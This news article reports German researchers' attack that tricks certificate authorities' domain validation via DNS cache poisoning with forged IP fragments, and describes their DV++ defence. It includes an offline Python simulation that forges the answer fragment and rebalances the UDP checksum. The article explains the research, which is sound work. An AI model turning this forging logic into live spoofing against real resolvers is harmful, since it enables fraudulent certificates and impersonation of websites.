How to nab an HTTPS cert for a stranger's website: Step one, shatter those DNS responses...

Domain validation systems fooled by boffins

Updated: Researchers in Germany have shown how to obtain HTTPS certificates for web domains they don't own, even though the issuing certificate authorities check domain ownership via domain validation (DV) before handing them out.

Essentially, some certificate authorities can be tricked into incorrectly issuing certs, meaning a miscreant can get an SSL/TLS certificate for someone else's domain and use it to stand up a malicious copy of that website. People lured to the fake site will be told by their browsers that the connection is secure, when really they're visiting a spoofed version.

Dr Haya Shulman of the Fraunhofer Institute for Secure Information Technology (SIT), one of the boffins behind the research, told The Register that a "weak off-path attacker", one who cannot see or intercept the traffic between the CA and the victim's nameserver, can, using nothing more than a laptop, effectively steal credentials, eavesdrop, or distribute malware using the method. The group has, for now, withheld the names of the certificate authorities (CAs) that can be tricked into incorrectly issuing certs.

In a paper seen by The Register, to be presented at the ACM Conference on Computer and Communications Security (CCS) in Toronto, Canada, in October, Dr Shulman's team wrote:

The attack exploits DNS cache poisoning and tricks the CA into issuing fraudulent certificates for domains the attacker does not legitimately own – namely certificates binding the attacker's public key to a victim domain.

The group has asked The Register not to republish the paper because it names affected certificate authorities. We have, however, seen a demo of a live attack by Fraunhofer SIT's team. The technique ensures that the DNS lookups the CA performs for domain validation are answered, in part, by the attacker rather than by a nameserver belonging to the domain's owner, and the attacker uses that to obtain a cert for the domain.

"The attack is initiated with a DNS request," the paper explained. "To succeed in the attack, the attacker has to craft a correct DNS response before the authentic response from the real nameserver arrives."

The attack depends on getting the DNS response broken into IP fragments, and then injecting a forged fragment so that the CA's resolver reassembles a response of the attacker's choosing. The first fragment, which the attacker leaves alone, carries the fields the resolver uses to decide a response is genuine: the transaction ID, the port numbers and the question. The remaining fragment, which the attacker supplies, can contain whatever answer records the miscreant needs to pass the validation check and obtain the cert.

Network admins will have worked out by now that the attacker needs to do some homework to make this work: they have to examine responses from the victim's nameserver to calculate "the offset where the fragmentation should occur," so that the forged fragment lines up exactly with the genuine one it replaces. Because the UDP length and checksum travel in the first fragment, which the attacker does not control, the forged fragment must also keep the reassembled datagram the same length and consistent with that checksum.
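To make the mechanism concrete, here is an added, offline simulation written for this article; it is not code from the Fraunhofer SIT paper or its authors, and it shows the generic fragmentation trick rather than anything specific to a named CA. All addresses are constructed from the RFC 5737 documentation ranges, the domain name is made up, the reassembler is a toy that keeps the first fragment seen for each offset, and the IP ID and fragmentation offset are assumed to be already known to the attacker, which is the homework step described above. The forged tail keeps the same length as the real one and uses the attacker-chosen TTL to keep the UDP checksum, which sits in the untouched first fragment, valid.

```python
import struct

# Constructed addresses (RFC 5737 documentation ranges); nothing here is a real host.
RESOLVER_IP = "198.51.100.10"   # hypothetical CA-side resolver
AUTH_NS_IP = "203.0.113.53"     # hypothetical authoritative nameserver for the victim domain
VICTIM_DOMAIN = "victim.example"
LEGIT_IP = "203.0.113.80"       # what the real A record says
ATTACKER_IP = "192.0.2.66"      # what the attacker wants the CA's resolver to see

def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))

def encode_name(name):
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"

def build_dns_response(txid, qname, answer_ip, ttl=300):
    """Minimal DNS answer: header, one question, one A record (owner name via pointer 0xc00c)."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(qname) + struct.pack("!HH", 1, 1)            # QTYPE A, QCLASS IN
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + ip_bytes(answer_ip)
    return header + question + answer

def fold(data):
    """Ones'-complement sum of 16-bit words (the arithmetic behind the UDP checksum)."""
    if len(data) % 2:
        data += b"\x00"
    s = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return s

def pseudo_header(src, dst, udp_len):
    return ip_bytes(src) + ip_bytes(dst) + struct.pack("!BBH", 0, 17, udp_len)

def build_udp(src, dst, sport, dport, payload):
    length = 8 + len(payload)
    header = struct.pack("!HHHH", sport, dport, length, 0)
    csum = (~fold(pseudo_header(src, dst, length) + header + payload)) & 0xFFFF
    return header[:6] + struct.pack("!H", csum or 0xFFFF) + payload

def udp_checksum_ok(src, dst, dgram):
    length = struct.unpack("!H", dgram[4:6])[0]
    return len(dgram) == length and fold(pseudo_header(src, dst, length) + dgram) == 0xFFFF

def fragment(ip_id, dgram, split_at):
    """Split a datagram into two IPv4 fragments as (ip_id, offset, more_fragments, data)."""
    assert split_at % 8 == 0, "IPv4 fragment offsets are multiples of 8 bytes"
    return [(ip_id, 0, True, dgram[:split_at]), (ip_id, split_at, False, dgram[split_at:])]

def reassemble(ip_id, arrivals):
    """Toy reassembler: the first fragment seen for an offset wins; later duplicates are dropped."""
    slots, total = {}, None
    for fid, off, more, data in arrivals:
        if fid != ip_id:
            continue
        slots.setdefault(off, data)
        if not more:
            total = off + len(data)
    buf = b""
    while total is not None and len(buf) < total:
        buf += slots[len(buf)]          # a KeyError here would mean a hole in the buffer
    return buf

def parse_a_record(msg):
    """Return (transaction ID, dotted IPv4, TTL) from a one-question, one-answer DNS message."""
    txid = struct.unpack("!H", msg[:2])[0]
    p = 12
    while msg[p]:                        # skip the question's name labels
        p += msg[p] + 1
    p += 1 + 4                           # root label, QTYPE, QCLASS
    _, _, ttl, rdlen = struct.unpack("!HHIH", msg[p + 2:p + 12])
    return txid, ".".join(str(b) for b in msg[p + 12:p + 12 + rdlen]), ttl

def forge_second_fragment(legit_tail, attacker_ip):
    """Swap the A record's rdata and re-balance the UDP checksum, which lives in fragment 1.

    The attacker never touches the first fragment (UDP length and checksum included), so the
    forged tail keeps the same length and the same 16-bit word sum: the attacker-chosen TTL's
    low word absorbs the difference. Assumes the tail starts at the answer RR
    (name ptr 2 | type 2 | class 2 | TTL 4 | rdlength 2 | rdata 4).
    """
    fid, off, more, data = legit_tail
    ttl_hi, ttl_lo = struct.unpack("!HH", data[6:10])
    old_sum = sum(struct.unpack("!HH", data[12:16]))
    new_sum = sum(struct.unpack("!HH", ip_bytes(attacker_ip)))
    ttl_lo = (ttl_lo + old_sum - new_sum) % 0xFFFF    # ones'-complement sums are taken mod 0xFFFF
    forged = data[:6] + struct.pack("!HH", ttl_hi, ttl_lo) + data[10:12] + ip_bytes(attacker_ip)
    return (fid, off, more, forged)

def run_scenario(txid=0x1A2B, resolver_port=41234, ip_id=0xBEEF):
    """Assumes the IP ID and the split offset are already known to the attacker (constructed values)."""
    legit = build_udp(AUTH_NS_IP, RESOLVER_IP, 53, resolver_port,
                      build_dns_response(txid, VICTIM_DOMAIN, LEGIT_IP))
    # Split after UDP header + DNS header + question (40 bytes here): fragment 1 keeps every
    # field the resolver checks (port, transaction ID, question); the tail holds the answer.
    split = 8 + 12 + len(encode_name(VICTIM_DOMAIN)) + 4
    frag1, frag2 = fragment(ip_id, legit, split)
    honest = reassemble(ip_id, [frag1, frag2])
    poisoned = reassemble(ip_id, [forge_second_fragment(frag2, ATTACKER_IP), frag1, frag2])
    h_txid, h_ip, _ = parse_a_record(honest[8:])
    p_txid, p_ip, p_ttl = parse_a_record(poisoned[8:])
    return {"honest_ip": h_ip, "poisoned_ip": p_ip, "poisoned_ttl": p_ttl,
            "txid_matches": h_txid == p_txid == txid,
            "checksum_ok": udp_checksum_ok(AUTH_NS_IP, RESOLVER_IP, poisoned)}
```

Running `run_scenario()` returns the legitimate address for the honest reassembly and the attacker's address for the poisoned one, with the transaction ID unchanged and the UDP checksum still verifying. That is the point of the technique: port and transaction ID randomisation, the usual defences against off-path DNS spoofing, live in the fragment the attacker never has to guess. What the simulation leaves out is the hard part the researchers describe, namely learning the nameserver's fragmentation behaviour and the IP ID in advance, and it says nothing about which real resolvers or CAs behave this way.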

The research team proposed a domain validation protocol they dubbed "DV++" to block the attack. In summary, DV++ replaces the single lookup with a distributed model in which the validation queries are sent from multiple certification agents rather than one resolver, so an attacker has to fool most of them rather than just one.

"To pass a DV++ validation, domain owners must prove their ownership to a majority of the agents in a fully automated manner by responding to queries sent by the agents for the resource records in the domain."

Dr Shulman's collaborators in the project are Markus Brandt, Tianxiang Dai, Amit Klein and Michael Waidner. ®

Editor's note: This article was revised after publication to clarify that it is the websites being spoofed, not the certificates. The certs are handed over to the wrong person, in effect, and used to spoof legit sites.
